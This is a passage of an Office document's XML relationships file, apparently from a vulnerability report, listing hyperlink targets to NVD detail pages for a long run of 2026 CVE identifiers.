Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66818" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66819" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66820" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67368" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67370" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67373" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67380" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67381" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67384" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67385" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67388" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67631" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67638" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67639" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67642" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67643" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68775" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68786" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69266" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69268" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69273" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69282" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69461" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69464" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69465" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69518" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69669" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69716" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69724" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69860" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70203" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71336" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73006" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73016" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73028" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77480" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77481" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77482" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77483" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77484" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77486" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77487" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77495" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78456" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80083" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80096" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83992" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83996" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55250" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75133" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82064" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82075" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81525" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85388" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45221" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67378" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67379" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67636" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76958" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85656" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69479" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69638" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52767" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69846" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69906" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75594" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81354" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69510" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69620" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69813" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69858" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69989" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70342" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70563" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78444" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78450" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78583" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78626" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82066" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83997" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84393" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68834" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68838" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69332" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69412" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69423" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69503" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69505" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69727" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69773" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69826" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69847" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69875" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69876" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68787" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68832" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68841" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68875" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69265" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69270" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69293" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69295" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69298" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69307" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69312" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69323" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69352" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69421" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69475" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69476" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69489" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69532" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69571" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69580" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69583" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69584" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69589" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69593" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69687" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69707" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69709" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69738" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69787" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69822" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69841" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69844" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69900" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69907" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69921" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70289" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70564" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70569" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70572" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70581" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71334" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71337" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71343" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72941" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72988" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72990" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72991" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72992" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72993" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72994" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72995" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72996" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72997" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73000" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73001" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73002" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73007" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73011" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73015" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73020" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73021" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73026" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76967" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77489" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77500" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77503" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77904" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78447" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78448" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83498" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83942" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83952" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 